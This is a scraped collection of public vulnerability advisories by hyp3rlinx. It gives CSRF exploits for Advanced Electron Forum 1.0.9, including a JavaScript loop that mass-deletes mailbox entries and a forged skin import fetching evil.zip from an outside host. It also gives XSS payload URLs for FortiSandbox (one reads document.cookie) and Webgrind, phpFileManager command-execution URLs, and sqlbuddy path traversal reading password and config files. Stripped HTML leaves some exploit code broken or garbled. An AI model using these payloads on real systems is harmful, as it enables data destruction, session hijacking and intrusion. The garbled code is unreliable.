//Sent Email IDs seem to be stored using even numbers 2,4,6 etc...
//Inbox Email IDs seem to use odd numbers
var c=-1
var uwillsuffer;
var amttodelete=1
var inbox=document.getElementById("inbox")
var outbox=document.getElementById("sent")
function RUIN_EVERYTHING(){
c++
//Inbox IDs are even numbered Sent are odd.
if(c % 2 == 0){
arguments[3].value=c
document.getElementById(arguments[1]).submit()
}else{
arguments[2].value=c
document.getElementById(arguments[0]).submit()
}
if(c>=amttodelete){
clearInterval(uwillsuffer)
alert("Done!")
}
}
uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox,
outbox)
CSRF 0x03:
Delete all 'Shouts'
http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=shoutboxset"
method="post">
document.getElementById('SPECTOR_OF_HATE').submit()
CSRF 0x04:
Delete all 'Topics' via simple GET request, this will delete topics 1 thru 7...
http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic=7,6,5,4,3,2,1
Disclosure Timeline:
===
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
==
Remote
Severity Level:
High
Description:
===
Request Method(s): [+] POST / GET
Vulnerable Product:[+] AEF v1.0.9 (exploit patched version)
===
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
Advanced Electron Forum v1.0.9 RFI / CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt
Vendor:
=
www.anelectron.com/downloads/
Product:
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
Remote File Inclusion / CSRF
CVE Reference:
==
N/A
Vulnerability Details:
=
In Admin control panel there is option to Import Skins and one choice is using
a web URL.
>From AEF:
"Specify the URL of the theme on the net. The theme file must be a compressed
archive (zip, tgz, tbz2, tar)."
However there is no CSRF token or check made that this is a valid request made
by the currently logged in user, resulting
in arbitrary remote file imports from an attacker if the user visits or clicks
an malicious link. Victims will then be left
open to arbitrary malicious file downloads from anywhere on the net which may
be used as a platform for further attacks...
Exploit code(s):
===
http://localhost/AEF(1.0.9)_Install/index.php?act=admin=skin=import"
method="post">
http://hyp3rlinx.altervista.org/evil.zip; />
document.getElementById('EL-DOWNLOADO').submit()
Disclosure Timeline:
==
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
===
High
Description:
==
Request Method(s): [+] POST
Vulnerable Product:[+] Advanced Electron Forum v1.0.9 (AEF)
==
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
Multiple XSS vulnerabilities in FortiSandbox WebUI
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt
Vendor:
www.fortinet.com
PSIRT ID: 1418018
Product:
==
FortiSandbox 3000D v2.02 build0042
Vulnerability Type:
===
XSS
CVE Reference:
==
Pending
Advisory Information:
===
Multiple XSS vulnerabilities in FortiSandbox WebUI
Impact
A remote unauthenticated attacker may be able to execute arbitrary code in
the security context of an authenticated user's browser session.
Affected Products
FortiSandbox 2.0.4 and lower.
Solutions
Upgrade to FortiSandbox 2.1 or above.
Vulnerability Details:
http://www.fortiguard.com/advisory/FG-IR-15-019/
The Web User Interface of FortiSandbox version 2.0.4 and below is
vulnerable to multiple reflected Cross-Site Scripting vulnerabilities.
5 potential XSS vectors were identified:
* Fortiview threats by users search filtered by serial
* Fortiview threats by users search filtered by vdom
* Export report feature in the Fortiview search page
* Screenshot download generated by the VM scan feature
* PCAP file download generated by the VM scan feature
Exploit code(s):
===
1)
https://localhost/alerts/summary/profile/?prof_type=byusers-profilefrom=byusers-filterusername=10.10.10.10serial=scriptalert(666)/scriptscriptalert('XSS
by hyp3rlinx 06012015')/scriptvdom=from_time_period=1440#frag-1
vulnerable parameter: serial
--
2)
https://localhost/csearch/report/export/?urlForCreatingReport=scriptalert(666)/scriptscriptalert('XSS
by hyp3rlinx June 1, 2015')/script
vulnerable parameter: urlForCreatingReport
3)
https://localhost/analysis/detail/download/screenshot?id=/scriptalert('XSS
by hyp3rlinx June 1, 2015 '%2bdocument.cookie)/script
vulnerable parameter: id
--
Disclosure Timeline:
Vendor Notification: June 1, 2015
Vendor Disclosure: July 24, 2015
August 1, 2015 : Public Disclosure
Fixed In Firmware 2.1
Discovery Status:
=
Published
Exploitation Technique:
===
Remote unauthenticated
Severity Level:
===
Medium
Description:
=
Request Method(s): [+] GET
Vulnerable Product: [+] FortiSandbox 3000D v2.02
Vulnerable Parameter(s):[+] serial, urlForCreatingReport, id
Affected Area(s): [+] FortiSandbox Web Admin UI
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
phpFileManager 0.9.8 Remote Command Execution
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt Vendor: phpfm.sourceforge.net Product: phpFileManager version 0.9.8 Vulnerability Type: Remote Command Execution CVE Reference: == N/A Advisory Information: === Remote Command Execution Vulnerability Vulnerability Details: = PHPFileManager is vulnerable to remote command execution and will call operating system commands via GET requests from a victims browser. By getting the victim to click our malicious link or visit our malicious website. Exploit code(s): === Remote Command Execution: - 1- call Windows cmd.exe https://localhost/phpFileManager-0.9.8/index.php?action=6current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/cmd=c%3A\Windows\system32\cmd.exe 2- Run Windows calc.exe https://localhost/phpFileManager-0.9.8/index.php?action=6current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/cmd=c%3A\Windows\system32\calc.exe Disclosure Timeline: = Vendor Notification: NA July 28, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET Vulnerable Product: [+] phpFileManager 0.9.8 Vulnerable Parameter(s):[+] 'cmd'= [OS command] Affected Area(s): [+] Operating System === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Webgrind XSS vulnerability
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt
Vendor:
https://github.com/jokkedk/webgrind
Product:
Webgrind is a Xdebug Profiling Web Frontend in PHP.
Advisory Information:
=
Webgrind is vulnerable to cross site scripting attacks.
Exploit code:
==
http://localhost/webgrind/index.php?op=fileviewerfile=%3Cscript%3Ealert('XSS
hyp3rlinx')%3C/script%3E
Disclosure Timeline:
==
Vendor Notification May 19, 2015
May 20, 2015: Public Disclosure
Severity Level:
===
Med
Description:
Request Method(s):
[+] GET
Vulnerable Product:
[+] Webgrind
Vulnerable Parameter(s):
[+] file=[XSS]
Affected Area(s):
[+] Current user.
==
(hyp3rlinx)
Sqlbuddy Path Traversal Vulnerability
Exploit Author: John Page (hyp3rlinx) Website: hyp3rlinx.altervista.org/ Vendor Homepage: www.sqlbuddy.com Version: 1.3.3 SQL Buddy is an open source web based MySQL administration application. Advisory Information: == sqlbuddy suffers from directory traversal whereby a user can move about directories an read any PHP and non PHP files by appending the '#' hash character when requesting files via URLs. e.g. .doc, .txt, .xml, .conf, .sql etc... After adding the '#' character as a delimiter any non PHP will be returned and rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method. Normal sqlbuddy request: http://localhost/sqlbuddy/home.php?ajaxRequest=666requestKey=xx POC Exploit payloads: === 1-Read from Apache restricted directory under htdocs: http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any arbitrary files that do not have .PHP extensions: http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read phpinfo (no need for '#' as phpinfo is a PHP file): http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo Severity Level: === High Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable Parameter(s): [+] #page=somefile Affected Area(s): [+] Server directories sensitive files Solution - Fix Patch: === N/A
